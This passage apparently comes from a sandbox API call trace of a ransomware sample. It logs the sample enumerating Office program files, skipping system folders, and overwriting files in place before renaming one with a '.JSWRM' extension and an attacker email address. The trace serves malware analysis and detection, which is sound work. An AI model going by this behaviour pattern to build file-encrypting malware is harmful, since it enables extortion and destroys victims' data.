dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0143.904] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca829e1e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca829e1e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdb4d5695, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x162448, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="UCAddin.dll", cAlternateFileName="")) returned 1 [0143.904] lstrcmpiW (lpString1="UCAddin.dll", lpString2=".") returned 1 [0143.904] lstrcmpiW (lpString1="UCAddin.dll", lpString2="..") returned 1 [0143.904] lstrcmpiW (lpString1="UCAddin.dll", lpString2="...") returned 1 [0143.904] lstrcmpiW (lpString1="UCAddin.dll", lpString2="windows") returned -1 [0143.904] lstrcmpiW (lpString1="UCAddin.dll", lpString2="recovery") returned 1 [0143.904] lstrcmpiW (lpString1="UCAddin.dll", lpString2="perflogs") returned 1 [0143.904] lstrcmpiW (lpString1="UCAddin.dll", lpString2="documents and settings") returned 1 [0143.904] lstrcmpiW (lpString1="UCAddin.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.904] lstrcmpiW (lpString1="UCAddin.dll", lpString2="system volume information") returned 1 [0143.904] lstrcmpiW (lpString1="UCAddin.dll", lpString2="msocache") returned 1 [0143.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UCAddin.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UCAddin.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UCAddin.dll", lpUsedDefaultChar=0x0) returned 11 [0143.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0143.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UCAddin.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0143.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UCAddin.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UCAddin.dll", lpUsedDefaultChar=0x0) returned 11 [0143.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0143.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0143.905] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcdd102c2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdf2d2ac8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdf49c714, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x920468, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="UccApi.dll", cAlternateFileName="")) returned 1 [0143.905] lstrcmpiW (lpString1="UccApi.dll", lpString2=".") returned 1 [0143.905] lstrcmpiW (lpString1="UccApi.dll", lpString2="..") returned 1 [0143.905] lstrcmpiW (lpString1="UccApi.dll", lpString2="...") returned 1 [0143.905] lstrcmpiW (lpString1="UccApi.dll", lpString2="windows") returned -1 [0143.905] lstrcmpiW (lpString1="UccApi.dll", lpString2="recovery") returned 1 [0143.905] lstrcmpiW (lpString1="UccApi.dll", lpString2="perflogs") returned 1 [0143.905] lstrcmpiW (lpString1="UccApi.dll", lpString2="documents and settings") returned 1 [0143.905] lstrcmpiW (lpString1="UccApi.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.905] lstrcmpiW (lpString1="UccApi.dll", lpString2="system volume information") returned 1 [0143.905] lstrcmpiW (lpString1="UccApi.dll", lpString2="msocache") returned 1 [0143.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UccApi.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UccApi.dll", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UccApi.dll", lpUsedDefaultChar=0x0) returned 10 [0143.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0143.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UccApi.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UccApi.dll", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UccApi.dll", lpUsedDefaultChar=0x0) returned 10 [0143.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0143.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0143.905] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xed71c4aa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefd68243, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd8e49f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13b648, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="UcMapi.exe", cAlternateFileName="")) returned 1 [0143.905] lstrcmpiW (lpString1="UcMapi.exe", lpString2=".") returned 1 [0143.905] lstrcmpiW (lpString1="UcMapi.exe", lpString2="..") returned 1 [0143.905] lstrcmpiW (lpString1="UcMapi.exe", lpString2="...") returned 1 [0143.905] lstrcmpiW (lpString1="UcMapi.exe", lpString2="windows") returned -1 [0143.905] lstrcmpiW (lpString1="UcMapi.exe", lpString2="recovery") returned 1 [0143.905] lstrcmpiW (lpString1="UcMapi.exe", lpString2="perflogs") returned 1 [0143.905] lstrcmpiW (lpString1="UcMapi.exe", lpString2="documents and settings") returned 1 [0143.905] lstrcmpiW (lpString1="UcMapi.exe", lpString2="$RECYCLE.BIN") returned 1 [0143.905] lstrcmpiW (lpString1="UcMapi.exe", lpString2="system volume information") returned 1 [0143.905] lstrcmpiW (lpString1="UcMapi.exe", lpString2="msocache") returned 1 [0143.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UcMapi.exe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UcMapi.exe", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UcMapi.exe", lpUsedDefaultChar=0x0) returned 10 [0143.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0143.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UcMapi.exe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0143.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UcMapi.exe", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UcMapi.exe", lpUsedDefaultChar=0x0) returned 10 [0143.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0143.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0143.906] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x237aeb7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x48a2a0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Ucmp.dll", cAlternateFileName="")) returned 1 [0143.906] lstrcmpiW (lpString1="Ucmp.dll", lpString2=".") returned 1 [0143.906] lstrcmpiW (lpString1="Ucmp.dll", lpString2="..") returned 1 [0143.906] lstrcmpiW (lpString1="Ucmp.dll", lpString2="...") returned 1 [0143.906] lstrcmpiW (lpString1="Ucmp.dll", lpString2="windows") returned -1 [0143.906] lstrcmpiW (lpString1="Ucmp.dll", lpString2="recovery") returned 1 [0143.906] lstrcmpiW (lpString1="Ucmp.dll", lpString2="perflogs") returned 1 [0143.906] lstrcmpiW (lpString1="Ucmp.dll", lpString2="documents and settings") returned 1 [0143.906] lstrcmpiW (lpString1="Ucmp.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.906] lstrcmpiW (lpString1="Ucmp.dll", lpString2="system volume information") returned 1 [0143.906] lstrcmpiW (lpString1="Ucmp.dll", lpString2="msocache") returned 1 [0143.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ucmp.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0143.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ucmp.dll", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ucmp.dll", lpUsedDefaultChar=0x0) returned 8 [0143.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0143.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ucmp.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0143.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ucmp.dll", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ucmp.dll", lpUsedDefaultChar=0x0) returned 8 [0143.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0143.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0143.906] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x831d63af, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x834f7581, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xefec0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ucrtbase.dll", cAlternateFileName="")) returned 1 [0143.906] lstrcmpiW (lpString1="ucrtbase.dll", lpString2=".") returned 1 [0143.906] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="..") returned 1 [0143.906] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="...") returned 1 [0143.906] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="windows") returned -1 [0143.906] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="recovery") returned 1 [0143.906] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="perflogs") returned 1 [0143.906] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="documents and settings") returned 1 [0143.906] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.906] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="system volume information") returned 1 [0143.906] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="msocache") returned 1 [0143.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ucrtbase.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ucrtbase.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ucrtbase.dll", lpUsedDefaultChar=0x0) returned 12 [0143.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0143.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ucrtbase.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ucrtbase.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ucrtbase.dll", lpUsedDefaultChar=0x0) returned 12 [0143.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0143.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0143.907] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x237aeb7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbd8b0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="upe.dll", cAlternateFileName="")) returned 1 [0143.907] lstrcmpiW (lpString1="upe.dll", lpString2=".") returned 1 [0143.907] lstrcmpiW (lpString1="upe.dll", lpString2="..") returned 1 [0143.907] lstrcmpiW (lpString1="upe.dll", lpString2="...") returned 1 [0143.907] lstrcmpiW (lpString1="upe.dll", lpString2="windows") returned -1 [0143.907] lstrcmpiW (lpString1="upe.dll", lpString2="recovery") returned 1 [0143.907] lstrcmpiW (lpString1="upe.dll", lpString2="perflogs") returned 1 [0143.907] lstrcmpiW (lpString1="upe.dll", lpString2="documents and settings") returned 1 [0143.907] lstrcmpiW (lpString1="upe.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.907] lstrcmpiW (lpString1="upe.dll", lpString2="system volume information") returned 1 [0143.907] lstrcmpiW (lpString1="upe.dll", lpString2="msocache") returned 1 [0143.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="upe.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0143.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="upe.dll", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="upe.dll", lpUsedDefaultChar=0x0) returned 7 [0143.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="upe.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0143.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="upe.dll", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="upe.dll", lpUsedDefaultChar=0x0) returned 7 [0143.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0143.907] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4cfac8a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8e070, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="URLREDIR.DLL", cAlternateFileName="")) returned 1 [0143.907] lstrcmpiW (lpString1="URLREDIR.DLL", lpString2=".") returned 1 [0143.907] lstrcmpiW (lpString1="URLREDIR.DLL", lpString2="..") returned 1 [0143.907] lstrcmpiW (lpString1="URLREDIR.DLL", lpString2="...") returned 1 [0143.907] lstrcmpiW (lpString1="URLREDIR.DLL", lpString2="windows") returned -1 [0143.907] lstrcmpiW (lpString1="URLREDIR.DLL", lpString2="recovery") returned 1 [0143.907] lstrcmpiW (lpString1="URLREDIR.DLL", lpString2="perflogs") returned 1 [0143.907] lstrcmpiW (lpString1="URLREDIR.DLL", lpString2="documents and settings") returned 1 [0143.907] lstrcmpiW (lpString1="URLREDIR.DLL", lpString2="$RECYCLE.BIN") returned 1 [0143.907] lstrcmpiW (lpString1="URLREDIR.DLL", lpString2="system volume information") returned 1 [0143.907] lstrcmpiW (lpString1="URLREDIR.DLL", lpString2="msocache") returned 1 [0143.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="URLREDIR.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="URLREDIR.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="URLREDIR.DLL", lpUsedDefaultChar=0x0) returned 12 [0143.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0143.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="URLREDIR.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="URLREDIR.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="URLREDIR.DLL", lpUsedDefaultChar=0x0) returned 12 [0143.908] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1dddc34, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1dddc34, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x50ade23, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x10c8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VBS2EXCL.XSL", cAlternateFileName="")) returned 1 [0143.908] lstrcmpiW (lpString1="VBS2EXCL.XSL", lpString2=".") returned 1 [0143.908] lstrcmpiW (lpString1="VBS2EXCL.XSL", lpString2="..") returned 1 [0143.908] lstrcmpiW (lpString1="VBS2EXCL.XSL", lpString2="...") returned 1 [0143.908] lstrcmpiW (lpString1="VBS2EXCL.XSL", lpString2="windows") returned -1 [0143.908] lstrcmpiW (lpString1="VBS2EXCL.XSL", lpString2="recovery") returned 1 [0143.908] lstrcmpiW (lpString1="VBS2EXCL.XSL", lpString2="perflogs") returned 1 [0143.908] lstrcmpiW (lpString1="VBS2EXCL.XSL", lpString2="documents and settings") returned 1 [0143.908] lstrcmpiW (lpString1="VBS2EXCL.XSL", lpString2="$RECYCLE.BIN") returned 1 [0143.908] lstrcmpiW (lpString1="VBS2EXCL.XSL", lpString2="system volume information") returned 1 [0143.908] lstrcmpiW (lpString1="VBS2EXCL.XSL", lpString2="msocache") returned 1 [0143.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VBS2EXCL.XSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VBS2EXCL.XSL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBS2EXCL.XSL", lpUsedDefaultChar=0x0) returned 12 [0143.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VBS2EXCL.XSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VBS2EXCL.XSL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBS2EXCL.XSL", lpUsedDefaultChar=0x0) returned 12 [0143.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.908] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\VBS2EXCL.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\vbs2excl.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0143.910] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=4296) returned 1 [0143.910] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.910] ReadFile (in: hFile=0x45c, lpBuffer=0x27b348, nNumberOfBytesToRead=0x10c0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345ec04*=0x10c0, lpOverlapped=0x0) returned 1 [0143.912] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.912] WriteFile (in: hFile=0x45c, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345ec00*=0x10c0, lpOverlapped=0x0) returned 1 [0143.912] CloseHandle (hObject=0x45c) returned 1 [0143.912] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\VBS2EXCL.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\vbs2excl.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\VBS2EXCL.XSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\vbs2excl.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.913] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1dddc34, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1dddc34, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x50ade23, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x189d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VBS2WORD.XSL", cAlternateFileName="")) returned 1 [0143.913] lstrcmpiW (lpString1="VBS2WORD.XSL", lpString2=".") returned 1 [0143.913] lstrcmpiW (lpString1="VBS2WORD.XSL", lpString2="..") returned 1 [0143.913] lstrcmpiW (lpString1="VBS2WORD.XSL", lpString2="...") returned 1 [0143.913] lstrcmpiW (lpString1="VBS2WORD.XSL", lpString2="windows") returned -1 [0143.913] lstrcmpiW (lpString1="VBS2WORD.XSL", lpString2="recovery") returned 1 [0143.913] lstrcmpiW (lpString1="VBS2WORD.XSL", lpString2="perflogs") returned 1 [0143.913] lstrcmpiW (lpString1="VBS2WORD.XSL", lpString2="documents and settings") returned 1 [0143.913] lstrcmpiW (lpString1="VBS2WORD.XSL", lpString2="$RECYCLE.BIN") returned 1 [0143.913] lstrcmpiW (lpString1="VBS2WORD.XSL", lpString2="system volume information") returned 1 [0143.913] lstrcmpiW (lpString1="VBS2WORD.XSL", lpString2="msocache") returned 1 [0143.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VBS2WORD.XSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VBS2WORD.XSL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBS2WORD.XSL", lpUsedDefaultChar=0x0) returned 12 [0143.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VBS2WORD.XSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, 